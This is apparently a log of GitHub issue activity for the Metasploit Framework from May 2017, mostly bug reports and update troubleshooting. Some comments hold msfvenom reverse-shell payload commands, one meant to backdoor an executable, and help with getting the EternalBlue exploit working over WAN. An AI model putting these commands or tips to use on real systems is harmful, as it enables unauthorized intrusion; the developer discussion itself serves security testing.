Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  ---

[2017-05-19 17:58] FireFart commented on #8416
This is the line causing troubles:
https://github.com/rapid7/metasploit-framework/blob/90c86dbc949707aa9412717fe4d995c00c7fa699/modules/exploits/windows/smb/ms17_010_eternalblue.rb#L293
It looks like `get_once` returns nil

[2017-05-19 18:15] busterb commented on #8416
Can you guys verify whether #8399 fixes this issue. Also see discussion there about get_once: I believe these need to be replaced with `get` calls that specify how many bytes to read so it blocks appropriately (note that Socket.get in rex-socket has a loop internally to handle this.)

[2017-05-19 18:55] fairnorthalaska opened #8417 "Vulnerability references are missing once the Nexpose scan has imported into Metasploit."
## Steps to reproduce

How'd you do it?

0. Launch msfconsole
1. Load Nexpose plugin
2. Launch a Nexpose scan and wait for the import process to complete.
3. List vulnerabilities (exaple: "vulns 192.168.1.10").
4. Looking at the "refs=" section of each vulnerability shows nothing; they are blank.

## Expected behavior

Get the references imported into Metasploit database, so I can search for match

[2017-05-19 21:45] FireFart commented on #8413
@AgoraSecurity can you please try with the following PR?
https://github.com/rapid7/metasploit-framework/pull/8420/files

[2017-05-19 21:55] islamTaha12 commented on #8416
@busterb This pr has the same issue too .. I'm trying to test it via wan so I used windows/meterpreter/reverse_https with the following options:

- set lhost < my public ip>
- set port 443
- set reverselistenerbindaddress 192.168.1.8

I received this error too!
![screenshot from 2017-05-19 23-46-51](https://cloud.githubusercontent.com/assets/17981089/26268200/694e1eca-3cee-11e7-9c62-43c47c28ba76.p

[2017-05-20 10:44] bcoles commented on #8258
This patch will fix the issue. Although probably not the best approach.

Basically just a copy/paste of the `show_options(mod)` method from [lib/msf/ui/console/command_dispatcher/modules.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/ui/console/command_dispatcher/modules.rb#L1000).

It also fixes an output issue with `'\n'` instead of `"\n"`.

[code]

[2017-05-20 18:34] m-oleary opened #8423 "auxiliary/scanner/smb/smb_login"
Attempting to run auxiliary/scanner/smb/smb_login against a target fails with the error Auxiliary failed: NoMethodError undefined method `disconnect!' for nil:NilClass if the the tested password is something other than ASCII.

## Steps to reproduce

msf auxiliary(smb_enumusers) > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set pass_file /usr/share/wordlists/metasploit/password.l

[2017-05-21 23:32] OJ opened #8425 "Add "label" support to sessions"
Sessions are currently identifiable by ip, machine name and user context when viewed from the sessions list. It'd be fantastic to have the ability to add some kind of label to the session to make it more identifiable. For example. if I pop SYSTEM on a CFO's desktop, I don't have the ability to know that it's the CFO's desktop from looking at the session list. I'd like to be able to do something li

[2017-05-21 23:35] OJ opened #8426 "Make `lpwd` and `lcd` session-specific"
Both `lpwd` and `lcd` execute in the context of MSF regardless of the session that is currently active in Meterpreter. If you `lcd` in one session it applies to all sessions. I think it'd make more sense if there was a way to set a global and session specific working folder for sessions.

If `lcd` is called from within the Meterpreter context, I think the change should apply to just that session.

[2017-05-21 23:38] OJ opened #8427 "Fix file download to avoid timeouts"
If you're operating within a Meterpreter session that is using a slow or stateless transport (such as HTTPS), and you attempt to download a large file (eg. 5MB) then the Meterpreter `download` command will time out.

Instead of operating the same way as a typical command, the `download` command should probably make use of channels, or have some kind of batching interface in place so that the comma

[2017-05-22 00:20] busterb commented on #8122
Hmm, we could probably track down the segfault. Probably due to environment assumptions.

[2017-05-22 00:21] busterb commented on #8427
Hey @OJ we had a fix for this that we then backed out because it then caused packet ordering problems with reverse_tcp.

[2017-05-22 00:23] busterb commented on #8427
See #7993

[2017-05-22 01:00] busterb commented on #8425
Sounds good to me. It might be even better to tie this to machine_id so if it reconnects you can still see it is CFO-DESKTOP (or rather CFO-LAPTOP, who uses desktops these days :)

[2017-05-22 01:01] busterb commented on #8425
hey @darkbushido @clee-r7 please give this a gander (they're busy fixing a bunch of stuff in the database now, so making sure they're looped in)

[2017-05-22 02:06] OJ commented on #8425
Yeah that's a good idea. Would be great to have that persist across sessions. However, it'd be better to tie to the soon_to_be_implemented session ID, because we may have multiple sessions on the same machine with different labels?

[2017-05-22 02:06] OJ commented on #8427
Ooh yeah! Sorry about that.

[2017-05-22 03:37] busterb commented on #8425
Oh, you're thinking in terms of _that_ session ID! Got it.

[2017-05-22 05:06] OJ opened #8429 "Fix error when `PayloadProxyType` is not specified"
When generating Windows http/s payloads using proxy settings, if the `PayloadProxyType` is not specified when the other `PayloadProxy*` options are set, then venom errors out with:
[code]
I know what the issue is here, and I'm pretty sure I'm to blame for it too. From [here](https://github.com/rapid7/metasploit-framework/blob/cac890a797d0d770260074dfe703eb5cfb63bd46/lib/rex/payloads/meterpreter/co

[2017-05-22 05:54] wvu-r7 commented on #8415
Good luck getting the software. It's quite a bit to download, and I have no idea how the install process is going to be. If you have access to a live target, feel free to pick this up.

[2017-05-22 06:03] SigPloiter opened #8430 "Java Module"
Hello Guys,

I have a java based code as an auxiliary and i would like to import it to the framework. Would like to know if there is a chance to run jar files from console, is it supported yet?

[2017-05-22 08:04] fcafra commented on #8416
@bwatters-r7  sorry for delay,
The Windows version is "Windows 7 Enterprise" (not in virtual environment), Amd Athlon 64bit

[2017-05-22 08:09] louissTNT opened #8431 "vba-exe output format needs updating for MS Office versions from this decade"
i am trying to make macro file with msfvenom
i tried the to use exe2vba.rb with msfvenom but it keeps giving me error in msoffice 2007.
i also tried to use
msfvenom -f vba-exe and also the same issue
could any one help me plz?

[2017-05-22 10:15] timwr commented on #8431
This might help: https://community.rapid7.com/community/metasploit/blog/2017/03/08/attacking-microsoft-office-openoffice-with-metasploit-macro-exploits

[2017-05-22 10:21] wwebb-r7 commented on #8413
The exploit in it's current form will never work on 64 bit systems for a variety of reasons.  Suffice it to say it won't work because 64 bits vs 32 bits.  The underlying bug is almost assuredly still present on 64 bit systems, so the module will result in DoS attack.

Whether it's exploitable or not on 64 bit systems is also questionable.  Visual Studio makes some mysterious decisions on how to be

[2017-05-22 10:27] wwebb-r7 commented on #8407
I'm in a shellcode kind of mood.  I'll take a look sometime today.

[2017-05-22 11:20] wwebb-r7 commented on #8413
Closed.  See referenced merge.

[2017-05-22 11:20] #8413 closed

[2017-05-22 12:22] #8429 closed

[2017-05-22 14:57] BlackMathIT commented on #8408
You right, as we have written in the first post "We suppose the module have some issue when it encounters a not solved dnsname" so we are telling the same... in any case yes we have a list of hostnames

[2017-05-22 22:06] #8272 closed

[2017-05-23 02:43] timwr opened #8436 "sessions -u should work on meterpreter sessions"
Currently sessions -u doesn't work on meterpreter sessions.
I suggest we do the following:
1. Fix shell_to_meterpreter to support armle, x64, etc, linux meterpreter
2. Create a new module called upgrade_meterpreter that attempts to launch a bare mettle meterpreter session that is as close to target architecture/platform as possible, e.g:
Android meterpreter -> armle/x86/x64 linux meterpreter
Java

[2017-05-23 02:44] emmettr1 opened #8437 "Won't generate python code for targeting"
Last login: Mon May 22 19:10:47 on ttys000
JesusChristLAS:~ emmettreiner$ msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.55.159  LPORT=6680 > pyterpreter.py
No platform was selected, choosing Msf::Module::Platform::Python from the payload
No Arch selected, selecting Arch: python from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 362 bytes

JesusChrist

[2017-05-23 04:19] timwr commented on #8437
Don't try and run msfvenom from within msfconsole. It's not supported

[2017-05-23 04:25] timwr commented on #8199
@OJ I can grab this if you like. I'm sure you have bigger things :)

[2017-05-23 06:43] makefu opened #8438 "Github release hash changes"
## Steps to reproduce

1. Download latest release of metasploit framework from releases page
2. Wait 7 days and download the same release

## Expected behavior

The release should have the same checksum as the release version has not been increased.
## Current behavior

Releases have different checksums. Between 16. and 21. May this happened three times.

## System stuff

### Metasploit version

H

[2017-05-23 06:47] tijnar33 opened #8440 "Fail to load module (syntax error)"
after I added the smb_ms17_010 script file into my metasploit framework and load the msfconsole I got the error like this (see image). I am running kalilinux rolling.
![screenshot from 2017-05-23 12-30-53](https://cloud.githubusercontent.com/assets/25560324/26341489/cea87a28-3fb3-11e7-8654-82e2c7088f15.png)

[2017-05-23 06:51] tijnar33 opened #8441 "Fail to load module (syntax error)"
after I added the smb_ms17_010 script file into my metasploit framework and load the msfconsole I got the error like this (see image). I am running kalilinux rolling.
![screenshot from 2017-05-23 12-30-53](https://cloud.githubusercontent.com/assets/25560324/26341592/4d899822-3fb4-11e7-9f8c-74bd8f656bcd.png)

[2017-05-23 07:14] void-in commented on #8441
You have downloaded the html file that is displayed on the Github page. The module has been merged within the msf tree and should be available to Kali users as well. Run msfupdate or apt-get update and Kali should pick up the updated version.

If you have other support queries, please use https://community.rapid7.com

[2017-05-23 07:14] #8441 closed

[2017-05-23 07:14] void-in commented on #8440
Dup of https://github.com/rapid7/metasploit-framework/issues/8441

[2017-05-23 07:14] #8440 closed

[2017-05-23 07:16] DevilOfExcitement commented on #8416
#8419 should fix this. (Not really a fix though, but better stack handling when there's no SMB reply)

[2017-05-23 08:18] Mic92 commented on #8438
Is this somehow related to jenkins?

[2017-05-23 12:54] SecurityAddicted commented on #8339
Same here on OSX and Dev install.
`msfconsole -L` fix the issue.

[2017-05-23 13:02] 5P4D3 opened #8443 "fatal: Not a git repository (or any of the parent directories): .git"
Everytime i open my Metasploit.. it always shows this

`fatal: Not a git repository (or any of the parent directories): .git`

How to fix this?

[2017-05-23 13:05] 5P4D3 commented on #8443
My MSF Version

[code]
![screenshot at 2017-05-23 21-04-03](https://cloud.githubusercontent.com/assets/18681023/26355492/88018978-3ffb-11e7-96ce-fa43bdd83d29.png)

[2017-05-23 13:12] h00die commented on #8443
While it's a different error, please check https://github.com/rapid7/metasploit-framework/issues/8398 they're most likely related, the fix may also work, or please put in a ticket with the OS creator

[2017-05-23 19:52] renpic opened #8444 "Travis isn't executing "rake spec" tests"
## Steps to reproduce

This was taken from a `bundle exec rake spec SPEC_OPTS="--tag content"` build.

The `rake spec` is never executed. You can pick any recent job log, and you will see the same situation.

Due to an error, instead of executing `bundle exec rake spec`, Travis will just execute `bundle`, and that will only print the name and version of installed gems.

## More details

From the j

[2017-05-24 11:19] islamTaha12 opened #8446 "ms17_010_eternalblue: Connection reset by peer error"
**Scenario:**
Exploit Windows 7 Ultimate 7601 Service Pack 1 using the latest ms17_010_eternablue code https://github.com/rapid7/metasploit-framework/pull/8419 over **WAN** is producing the following error, However, It is going perfect in **LAN**
![screenshot from 2017-05-24 13-09-22](https://cloud.githubusercontent.com/assets/17981089/26400818/2a59fb9c-4083-11e7-92c7-44814b309fb9.png)

**Scenario

[2017-05-24 11:29] islamTaha12 commented on #8416
@DevilOfExcitement Yes, This PR fixes this issue but there is another issue and we can't gain reverse shell yet https://github.com/rapid7/metasploit-framework/issues/8446 so please close this one.

[2017-05-24 12:54] islamTaha12 commented on #8446
Please close this issue cause I found that the target machine has been updated and for others whose can find the same issue please make sure that the target isn't patched.

You can scan the target machines using nmap script out metasploit scanner

[2017-05-24 12:54] #8446 closed

[2017-05-24 14:11] islamTaha12 opened #8447 "smb_ms17_010: Can't gain a reverse shell over WAN however the target machine has the vuln"
**Scenario:**
Exploit Windows 7 Ultimate 7601 Service Pack 1 using the latest ms17_010_eternablue code https://github.com/rapid7/metasploit-framework/pull/8419 over **WAN** is producing the following error, However, It is going perfect in **LAN**

**Metasploit Version:**
metasploit v4.14.20-dev-
![screenshot from 2017-05-24 16-08-01](https://cloud.githubusercontent.com/assets/17981089/26407454/81d

[2017-05-24 15:21] #8416 closed

[2017-05-24 17:31] NitroMS opened #8448 "/usr/bin/msfupdate:275:in `update_apt!': undefined method `blank?' for nil:NilClass (NoMethodError)"
## Steps to reproduce

run msfupdate from kali linux 2017.1

I have metasploit v4.14.21-dev in kali linux 2017.1, when i try msfupdate this is what i get.
![msfupdate](https://cloud.githubusercontent.com/assets/28870268/26416917/ca01f3aa-40b7-11e7-94cd-161672890b4e.png)

[2017-05-24 17:45] busterb commented on #8448
workaround - there's no reason to run 'msfupdate' on kali at all. It's a normal package, just use `apt-get update; apt-get upgrade`

[2017-05-24 17:56] NitroMS commented on #8448
@busterb Thanks, i will try that

[2017-05-24 18:24] #8448 closed

[2017-05-24 18:25] FireFart commented on #8448
@busterb what do you think about opening an issue on the kali bugtracker so msfupdate will be removed from the package if it's not needed? The current rule file is available from https://pkg.kali.org/pkg/metasploit-framework (https://pkg.kali.org/media/packages/m/metasploit-framework/rules-4.14.21-0kali1)

[2017-05-24 18:44] busterb commented on #8448
Yeah, that seems reasonable to me.

[2017-05-24 19:11] FireFart commented on #8448
@busterb can you do it or should we add the bug?

[2017-05-24 19:14] wwebb-r7 opened #8449 "Develop exploit module for CVE-2016-7288 [Microsoft Edge TypedArray.sort() UaF]"
Work in progress

![ntsh](https://cloud.githubusercontent.com/assets/16786368/26421315/43eb8000-408b-11e7-964b-52ed1a65d477.gif)

[2017-05-24 23:03] busterb commented on #8448
Please do @FireFart , I totally forgot what my Kali bugtracker credentials are.

[2017-05-24 23:07] FireFart commented on #8448
@busterb done: https://bugs.kali.org/view.php?id=4039

[2017-05-25 01:14] 5P4D3 commented on #8398
still waiting for the fix :(

[2017-05-25 01:16] busterb commented on #8398
I think I showed you what to do, and the fix isn't likely to come from us - it's in your distro packager. Can you point where the ParrotSec bug tracker is? I'll file a report there.

[2017-05-25 03:27] jhart-r7 opened #8451 "Update SMB modules with fingerprinting capabilities to use Recog native_lm fingerprints"
## Steps to reproduce

How'd you do it?

1. Run auxiliary/scanner/smb/smb_version against any SMB share that allows anonymous authentication
2. Notice that, at best OS fingerprints are returned.  Nothing about the service running is returned (for example, is it Samba...).  Furthermore, OS fingerprints are only obtained from the matching of the native_os against recog.  Similar functionality exists

[2017-05-25 06:34] BustedSec opened #8454 "The Nightly's are broken"
trying to update a nightly build with apt-get update on ubuntu 16.04 and 17.04 fails due to file not found.  Browsing https://apt.metasploit.com/ shows the actual links themselves are broken as well,

Using fresh install of ubuntu 16.04 with doing curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&   c

[2017-05-25 07:31] busterb commented on #8454
Should be good to go again. We had one job stepping on the other, which is why the arm package indexes were valid, but the x86 ones were empty. I merged them into one. Thanks @BustedSec

[2017-05-25 07:31] #8454 closed

[2017-05-25 15:30] BustedSec commented on #8454
@busterb thanks for fixing so quick.

[2017-05-25 18:57] linuxdaddy commented on #8447
Hey bro, when i try to use this exploit on WAN i get nothing similar to the photo you uploaded.
msf > version
Framework: 4.12.40-dev
Console  : 4.12.40-dev
Even when i set verbose true, i don't get any text like yours
Any help? Much appreciated.

[2017-05-26 00:18] cathedrall commented on #6398
I too can concur that this issue is back. It's definitely not working, even when I give metasploit known valid credentials. Testing against Metasploitable3.

msf auxiliary(winrm_login) > run
[-] 10.10.0.5:5985 - LOGIN FAILED: .\vagrant:vagrant (Incorrect: )
[-] 10.10.0.5:5985 - LOGIN FAILED: .\Administrator:vagrant (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module executi

[2017-05-26 00:41] wvu-r7 commented on #8443
You need to provide more details, @5P4D3. What distro? How did you install Metasploit?

[2017-05-26 00:41] wvu-r7 commented on #8443
Oh, it's Parrot. Please file a ticket with them.

[2017-05-26 00:41] #8443 closed

[2017-05-26 01:10] faun88 opened #8459 "MS17-10 fail"
Tried the MS17-10 against Metasploitable3 (Windows Server 2008 R2 Standard - not patched)

![prtscr capture_2](https://cloud.githubusercontent.com/assets/4800291/26476566/04acdbe2-41c0-11e7-8459-0609438bd89f.jpg)

Metasploit version: v4.14.21-dev
Kali version: Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.25-1kali1 (2017-05-04) x86_64 GNU

Both attacking pc (Kali) and target (Windows Server) are

[2017-05-26 03:43] harshil2105 opened #8460 "When I get a shell on android I'm getting windows help option in msfconsole"
Whenever I get a shell in android via metasploit I'm get connected but when I type help it shows me help command for windows and not for android...I have been using metasploit for a long time now...but I have not faced such a issue.....after getting a shell in android I'm no longer getting help commands for android but the commands do work sometimes until I loose the shell

[2017-05-26 04:45] timwr commented on #8460
Can you post a log, which windows commands in particular are you seeing?
You also shouldn't be losing the shell! Is this over wifi or 3g? reverse_tcp or http?
Can you try the `wakelock` command and see if that helps keep the shell?

[2017-05-26 04:48] timwr commented on #8460
Note that you won't see all the android and stdapi commands until the sysinfo command returns.
If the connection isn't good this can take a while :/

[2017-05-26 05:07] harshil2105 commented on #8460
I have 2-3 years experience in metasploit and I know what I'm saying... I was over LAN and used reverse_tcp and I'm using a Microsoft azure vps to run my metasploit server....I have never recieved this kind of error, I don't know why it opens windows help screen when I get a android shell

[2017-05-26 05:25] FireFart commented on #8443
Just a hint: the metasploit gemspec file contains a `git ls` to get the repository files (`git ls` uses `.gitignore` so non repo files are omitted). You will see the same message when using the docker image. There is also this issue where we tried to get rid of it but it caused problems with omnibus and metasploit pro: https://github.com/rapid7/metasploit-framework/pull/8048

[2017-05-26 05:43] harshil2105 commented on #8460
I have a speed connection of 600mb/s it's Preet fast checks by okala speedtest

[2017-05-26 06:05] timwr commented on #8460
I'm delighted you have experience with metasploit :)
Can you post a redacted log please? You can even send it to me privately if you wish. I'm unsure what you mean by windows commands. Specifically which windows commands are you seeing? What is the git commit hash of the version of metasploit you're using, e.g:
[code]

[2017-05-26 06:11] harshil2105 commented on #8460
What I mean by windows help command is.....after I get a shell via a android phone and I have a meterpreter shell opened and I type help it should show me all the list of commands for android exploitation like dump SMS and send SMS......but when I type help on my console I get all a list of commands but those commands are not for android but they are for windows...I don't know what the problem is?

[2017-05-26 06:23] timwr commented on #8460
"but when I type help on my console I get all a list of commands but those commands are not for android but they are for windows"
Which commands?

[2017-05-26 06:39] harshil2105 commented on #8460
Every command that you get when you get a windows shell and you type help but the point is I get android shell why I am getting a list of commands for a windows

[2017-05-26 06:40] timwr commented on #8460
What commands are you seeing? Can you post a log please?

[2017-05-26 06:45] JBelinchon opened #8461 "PAYLOAD linux/armle/mettle/reverse_tcp missing"
## Steps to reproduce

set PAYLOAD linux/armle/mettle/reverse_tcp

How'd you do it?

1. ...
2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?

## Current behavior

use exploit/android/browser/stagefright

[2017-05-26 06:45] timwr commented on #8460
This is what I get:
[code]

[2017-05-26 06:53] timwr commented on #8461
@JBelinchon
mettle is now know as meterpreter.
`set PAYLOAD linux/armle/meterpreter/reverse_tcp`

[2017-05-26 07:34] 0x00string commented on #7723
will close this after testing, but it seems to be generating a valid payload now! woohoo!

[2017-05-26 12:33] harshil2105 commented on #8460
I'm not getting this I have tried in kali,ubuntu and Debian I will send you my results now

[2017-05-26 12:40] Mas0x opened #8463 "Kali Linux - msfupdate error."
Command msfupdate - Kali Linux (Rolling)

root@kali:~# msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[*] Checking for updates via the APT repository
[*] Note: expect weekly(ish) updates using this method
/usr/bin/msfupdate:275:in `update_apt!': undefined method `blank?' for nil:NilClass (NoMethodError)
	from /usr/bin/msfupdate:140:in `block in run!'
	from /usr/bin/msfupda

[2017-05-26 12:44] harshil2105 commented on #8460
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Exec

[2017-05-26 12:45] harshil2105 commented on #8460
Point is I'm using a android phone to get a shell and I'm not getting android help commands

[2017-05-26 14:26] FireFart commented on #8463
@Mas0x this was discussed here: https://github.com/rapid7/metasploit-framework/issues/8448
msfupdate is not needed on kali linux. We also filled a bug so the msfupdate binary will be removed so people will not try to update via it.

[2017-05-26 14:26] #8463 closed

[2017-05-26 17:46] linuxdaddy opened #8465 "Update webview_addjavascriptinterface.rb to work for android 4.4 and above."
We are in 2017 and nowadays everyone uses high versions of android.
This module works for android up to 4.2 , while everyone uses 4.4.4 or above.
It would be great if someone updates this exploit to work for higher versions of android, up to v6.
Regards!

[2017-05-26 19:08] renpic commented on #8444
Full log of Travis job after last commit (f176315):

[code]

[2017-05-26 19:15] renpic commented on #8444
Sorry for the escape chars inside the pasted log.
But it should be possible to see that the `rake spec` tests are not executed.

[2017-05-27 00:55] 5P4D3 commented on #8443
its Parrot Sec 3.6 - Jolly Roger

[2017-05-27 01:49] cbrnrd commented on #8459
be sure that Metasplotable is x64 (x86 isn't supported by the exploit as of now)

[2017-05-27 03:46] P3t3rp4rk3r opened #8469 "Metasploit Not updating in Kali Linux 2017 Version"
$ sudo apt-get update & apt-get upgrade
$msfupdate
it's not working fine
Please find the below image
[
![msferror](https://cloud.githubusercontent.com/assets/7028794/26517761/108e841c-42bd-11e7-8129-007047f74650.PNG)
](url)

[2017-05-27 03:50] busterb commented on #8469
There is no reason to run msfupdate. apt-get upgrade already updated you to the latest package in Kali Linux.

[2017-05-27 03:50] #8469 closed

[2017-05-27 04:24] busterb commented on #8461
yeah, the mettle name was temporary in metasploit framework, please refer to it as meterpreter if you want a meterpreter prompt. We may add some other protocols later that will have a different name.

[2017-05-27 04:24] #8461 closed

[2017-05-27 04:26] busterb commented on #8459
I believe the guest OS type is 64-bit, so that shouldn't be a problem: https://github.com/rapid7/metasploitable3/blob/master/windows_2008_r2.json#L14

[2017-05-27 05:18] #8444 closed

[2017-05-27 05:39] macbook47 opened #8472 "msfupdate error user.name is not set in your global git configuration"
cannot update metasploit through msfupdate, got error :
[-] ERROR: user.name is not set in your global git configuration
[-] Set it by running: 'git config --global user.name "NAME HERE"'

Metasploit version: v4.14.22-dev-18f5203
OS : MacOs 10.10.5  Yosemite Darwin Kernel Version 14.5.0

[2017-05-27 05:42] busterb commented on #8472
Have you tried doing what it says?

[2017-05-27 09:28] #8472 closed

[2017-05-27 12:49] Spakman commented on #8339
I'm tracking this in https://github.com/ConnorAtherton/rb-readline/issues/138 but might as well post it here too.

I've narrowed this down (after breaking `pacman` far too many times...) to something that has changed in a recent ncurses.

* `ncurses-6.0+20170429-1` triggers this problem
* `ncurses-6.0+20170128-1` does not

[2017-05-27 15:13] Spakman commented on #8339
This is fixed in https://github.com/ConnorAtherton/rb-readline/commit/fd882edcd145c26681f9971be5f6675c7f6d1970.

[2017-05-28 08:41] islamTaha12 commented on #8447
@linuxdaddy
Make sure that u have the latest exploit code, I updated my framework to 4.14 and I added it manually. Please, post how did u configure the payload options here

[2017-05-28 15:02] linuxdaddy commented on #8447
I cant upgrade my metasploit to latest version. I run kali linux. I try
apt- get update && apt-get upgrade && apt-get dist-upgrade and still it
doesnt update. Tried with msfupdate and it says there are no updates
available. I have the actual kali repo. I mean in the repos page, the first
one. Need some help here. Thanks in advance!

On May 28, 2017 10:41 AM, "islamTaha12" <notifications@github.com

[2017-05-28 15:18] h00die commented on #8447
[code]
???
profit

[2017-05-28 15:19] linuxdaddy commented on #8447
should i remove the actual msf first? like apt-get remove metasploit?

On May 28, 2017 5:18 PM, "h00die" <notifications@github.com> wrote:

[2017-05-28 16:55] kathiedart opened #8475 "Module request: CVE-2017-7494 (EternalRed)"
It would be amazing to have the eternalred exploit included as a module:
https://www.exploit-db.com/exploits/42060/

[2017-05-28 17:01] cbrnrd commented on #8475
It's already merged in and being improved: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb

[2017-05-28 17:19] kathiedart commented on #8475
ah - I've seen that one - it just wasn't under the same name, I guess I need to search by CVE!
Cheers

[2017-05-28 17:19] #8475 closed

[2017-05-29 00:41] OJ commented on #8200
OK so we currently have [auxiliary/server/regsvr32_command_delivery_server](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/regsvr32_command_delivery_server.rb) and [exploit/windows/misc/regsvr32_applocker_bypass_server](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/regsvr32_command_delivery_server.rb). Probably fair to say

[2017-05-29 00:42] OJ commented on #8200
Derp! My bad, this isn't the regsvr approach! Reopened :)

[2017-05-29 00:43] OJ commented on #8239
Close this as fixed thanks to @ouahibelhanchi's work.

[2017-05-29 00:43] #8239 closed

[2017-05-29 00:44] OJ commented on #7710
The values are actually used behind the scenes, but for some reason aren't visible to the user when `advanced` is invoked. So the issue is more cosmetic than functional.

[2017-05-29 05:15] #8437 closed

[2017-05-29 07:15] timwr commented on #8460
I can't reproduce this. How are you generating the payload? Are you generating both the payload (apk) and handler with the latest version? Does `meterpreter > load android` help?
Maybe you could try re-generate a new payload and try reproduce. It's possible I've broken the backwards compatibility with older payloads at some point in the past. Does `webcam_snap -i 2` work?

[2017-05-29 07:18] harshil2105 commented on #8460
Android help commands do work sometimes but still no help menu for android commands

Sent from my iPhone

[2017-05-29 10:45] italy2010 opened #8477 "eternalblue exploit issue"
[code]

### OS

What OS are you running Metasploit on?

kali 2017

[2017-05-29 13:29] cbrnrd commented on #8477
Do you have any additional info on the target machine? (arch, windows version, etc.)

[2017-05-29 14:14] linuxdaddy commented on #8447
Okay got the latest version of metasploit. Same thing on the eternalblue_doublepulsar.
You are using exploit/windows/smb/eternalblue_doublepulsar right?

This is what i got when i tried on my other pc which is vulnerable:

![screenshot from 2017-05-29 16-11-14](https://cloud.githubusercontent.com/assets/26394383/26552965/be261252-4489-11e7-8c19-d1907b72028b.png)

[2017-05-29 14:43] linuxdaddy commented on #8447
Okay so this exploit is only for x64 machines?

[2017-05-29 15:58] legendary77 opened #8478 "MSF exploit RCE error"
Hello Rapid7

I have a worry for two weeks and I can not understand the problem.
I am on windows 7 and i do my updates regularly.
For some time all my RCE attacks no longer work even the famous Netapi of XP.

I use Virtualbox and kali is on a NAT network with the ports set up "all my listening ports are open"

My firewall and that of my virtual victim is also disabled.

I wonder if it is not the u

[2017-05-29 16:22] makefu commented on #8438
hey ho, any update on that issue?

[2017-05-29 17:16] linuxdaddy commented on #8447
Okay, i figured it out. When i try it i get the same results as you, because the target pc gets Blue Screen Of Death everytime i run the exploit. This should be fixed somehow.

[2017-05-29 17:17] Grezzo commented on #8292
I got the same error, and found that changing line 24 of priv.rb to `user_id = 0` worked round the issue (but obviously bypassed the check for root privileges).

I'm using metasploit 4.14.21-dev and was running the module against metasploitable 2 which is ubuntu 8.04

Running `id` on the session that I try to run the module on returns `uid=0(root) gid=0(root)`, but the module actually does `id -u`

[2017-05-29 17:17] h00die commented on #8478
My xp sp2 english box worked w/ a command shell payload:
[code]

[2017-05-29 17:18] h00die commented on #8478
however, meterpreter seems to fail...
[code]

[2017-05-29 17:19] h00die commented on #8478
however, meterpreter fails:
[code]

[2017-05-29 17:19] h00die commented on #8478
meterpreter bind_tcp works fine:
[code]

[2017-05-29 19:17] upgoingstar opened #8479 "Post Module (gnome_keyring_dump) - stdapi_railgun_api error."
## Steps to reproduce
Gain a linux meterpreter shell on a x86/x64 bit linux box.
How'd you do it?

1. Took a meterpreter session on linux box using msfvenom - elf type payload.
2. Used meterpreter to run the gnome_keyring_dump module.

## Expected behavior

Should have executed the post module without error and dump gnome keys.

## Current behavior

Throwing an error.

meterpreter > sysinfo
Comput

[2017-05-29 19:28] upgoingstar commented on #8479
Looks like I was trying with wrong meterpreter, this works with python meterpreter only.

[2017-05-29 20:33] tfriesen opened #8480 "exploit/linux/local/service_persistence missing newline in SYSV template"
## Steps to reproduce

1. gain root shell on linux host (metaploitable3 works well)
2. use exploit/linux/local/service_persistence
3. set session
4. set target 1 (system v, though Auto usually works)
5. run
6. trying to run "/etc/init.d/<service name> start" fails
7. inspecting /etc/init.d/<service name> shows a missing newline between the 'cd' command and the $cmd call (line 29 in my environment)

[2017-05-29 21:33] h00die commented on #8480
I'll take this since I wrote the module

[2017-05-29 23:50] 0xM opened #8481 "MSFVenom Shellcode Exit Behavior"
## Steps to reproduce
I am trying to create a reverse shell payload  `msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.50 LPORT=4444 -f hex` to backdoor an existing PE.

Victim OS: Vista Home Premium SP 1

## Expected behavior
I am expecting the PE to run normally if the remote system "10.0.0.50" is not listening on port 4444. By this I mean, the application continue to execute instructions norm

[2017-05-30 00:56] mlshore commented on #8477
Same issue, on both Windows 7 enterprise build 7601 SP1 and Windows 8.1 enterprise build 9600 no SP.  On launching the exploit Windows 7 throws a blue screen immediately and Windows 8 does nothing.

[2017-05-30 01:32] legendary77 commented on #8478
Hi, I tried your payload again but it still works.
See the pictures.

[http://i.imgur.com/3cHshPg.png](url)
[http://i.imgur.com/lpSTCuX.png](url)
[http://i.imgur.com/3BYijvt.png](url)
[http://i.imgur.com/nGuuQ4H.png](url)

Really help me solve this problem. thank

[2017-05-30 01:39] wwebb-r7 commented on #8481
Tagging [this](https://github.com/rapid7/metasploit-framework/issues/5811) issue for my own benefit.  I'll try to reproduce and take a look in the near future on my end.

[2017-05-30 01:41] h00die commented on #8478
see your own error message **Handler failed to bind to**

If it aint listening, how would it ever call back?

[2017-05-30 01:58] OJ commented on #8199
If you feel like it, sure :)

[2017-05-30 05:21] void-in commented on #8479
Re-opening since this is an issue with the native meterpreter. IIRC the railgun API is only available on the python meterpreter at the moment so the platform of the module should be changed from linux to python. /cc @zeroSteiner

[2017-05-30 07:29] Ractex commented on #8446
Metasploit scanner says target is exploitable but I'm still getting the "connection reset by peer" error. Any help?

[2017-05-30 07:53] void-in commented on #8393
Can you show how you configured the handler? Run show options and paste the output.

[2017-05-30 08:50] Ug0Security opened #8483 "broken payload selection system"
Little issue this morning while trying the new "is_known_pipename"

It seems that i've (it) broke the payload selection system

![image](https://cloud.githubusercontent.com/assets/28728543/26575345/1d132ba6-4525-11e7-8e36-fc633fe12f86.png)

![image](https://cloud.githubusercontent.com/assets/28728543/26575460/a0e0952c-4525-11e7-9bf4-bb53b2a90055.png)

